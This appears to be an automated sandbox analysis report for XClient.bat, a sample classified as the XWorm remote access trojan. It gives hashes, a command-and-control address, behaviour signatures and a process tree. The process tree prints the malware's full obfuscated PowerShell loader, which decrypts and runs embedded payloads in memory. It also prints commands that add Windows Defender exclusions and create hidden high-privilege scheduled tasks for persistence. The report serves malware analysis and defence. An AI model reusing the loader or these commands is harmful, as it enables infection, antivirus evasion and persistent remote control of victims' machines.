Analysis

  • max time kernel
    106s
  • max time network
    125s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30-05-2024 14:09

General

  • Target

    XClient.bat

  • Size

    302KB

  • MD5

    7a5f5944302b8298714b56ae2f138b7c

  • SHA1

    669b42f2f6e76895899d84d5ad7a12f23d951f13

  • SHA256

    3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

  • SHA512

    73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

  • SSDEEP

    6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4008
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_964_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_964.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3436
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_964.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3616
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_964.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_964.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_964.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5008
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3084
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4340
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1796
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3252
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
              6⤵
              • Creates scheduled task(s)
              PID:4904
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"
              6⤵
                PID:4580
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA7.tmp.bat""
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1160
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  7⤵
                  • Delays execution with timeout.exe
                  PID:3236

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      df472dcddb36aa24247f8c8d8a517bd7

      SHA1

      6f54967355e507294cbc86662a6fbeedac9d7030

      SHA256

      e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

      SHA512

      06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      2ccec3db8c28304d166b116d58c04279

      SHA1

      c463583f3bab40b2f7e057dc8708b4530bd110e9

      SHA256

      d2a0cb8e1dab562542360b056514d6e35a0f4c87404fb8d0e9822c55dfeebcf3

      SHA512

      12230f4b6c1ab047b1b701d9a320bfc2d5bfab87bf66c54d656c42884be75567b5024aee4b5c0c75e666a2dd1b140850323e2ec46d1dd756f8fcfd8cfa1f0f78

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      eb15ee5741b379245ca8549cb0d4ecf8

      SHA1

      3555273945abda3402674aea7a4bff65eb71a783

      SHA256

      b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

      SHA512

      1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      05b3cd21c1ec02f04caba773186ee8d0

      SHA1

      39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

      SHA256

      911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

      SHA512

      e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      6f0e62045515b66d0a0105abc22dbf19

      SHA1

      894d685122f3f3c9a3457df2f0b12b0e851b394c

      SHA256

      529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319

      SHA512

      f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      34c8b93dd58a4703db0d6dd86bb21d70

      SHA1

      b53aa49b882070b857951b6638d6da3a03ac2f56

      SHA256

      34b95e4d12196f68f7a030b98190fda89c34b696251ab9ed831e48d983896898

      SHA512

      bba4a86b8a66104ed21fd58717168cdf68b93c801a94ec65e25c2b66c1b9354b9e7c1c01cadde451948e072d96c3fa4994c94ef33aeff9b603e7b5d82f7111e7

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oi1wmoto.tlr.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\tmpA7.tmp.bat

      Filesize

      169B

      MD5

      cdfa2cbc82657a00cae9aaba46c0ea36

      SHA1

      432fe15f89ebe0e75f0f39aff4990ca136a856fa

      SHA256

      5db3674f39627900841db0284230a38f3d90292b678dc343a3227276758a3010

      SHA512

      06987d0746c045cb81ea394ff777aeafa46d3e2b2ed1f93ae18b4860a689ad549ec87d93ab8929aa851bc8a7d47427508047256dd3620d7c5e76c1912649c922

    • C:\Users\Admin\AppData\Roaming\startup_str_964.bat

      Filesize

      302KB

      MD5

      7a5f5944302b8298714b56ae2f138b7c

      SHA1

      669b42f2f6e76895899d84d5ad7a12f23d951f13

      SHA256

      3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

      SHA512

      73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

    • C:\Users\Admin\AppData\Roaming\startup_str_964.vbs

      Filesize

      115B

      MD5

      e2839c6e276e0e1e65cd343d3afd8423

      SHA1

      853ffa8a050c4b9c608dd0f85ad30fdf15b3ac5c

      SHA256

      df5ccd14db28ca84f195d87231dfe9ebead2ee1d30142691ef6973310bdd4056

      SHA512

      039510ae8794cb33dfedf7197adbbce4ece3411cdea1094261df9f84ae05a4143dbbbe993ab9084fb353e4f90d756704e58e114d1c110f7b9d394ebc4bc80874

    • memory/2352-13-0x000001B36D8B0000-0x000001B36D8B8000-memory.dmp

      Filesize

      32KB

    • memory/2352-12-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/2352-9-0x000001B36D640000-0x000001B36D662000-memory.dmp

      Filesize

      136KB

    • memory/2352-10-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/2352-93-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/2352-92-0x00007FFF96E03000-0x00007FFF96E05000-memory.dmp

      Filesize

      8KB

    • memory/2352-14-0x000001B36D8C0000-0x000001B36D8FA000-memory.dmp

      Filesize

      232KB

    • memory/2352-11-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/2352-0-0x00007FFF96E03000-0x00007FFF96E05000-memory.dmp

      Filesize

      8KB

    • memory/3436-25-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/3436-16-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/3436-27-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/3436-26-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/3436-30-0x00007FFF96E00000-0x00007FFF978C2000-memory.dmp

      Filesize

      10.8MB

    • memory/5008-48-0x000001806F700000-0x000001806F71A000-memory.dmp

      Filesize

      104KB

    • memory/5008-94-0x000001806FB20000-0x000001806FB2C000-memory.dmp

      Filesize

      48KB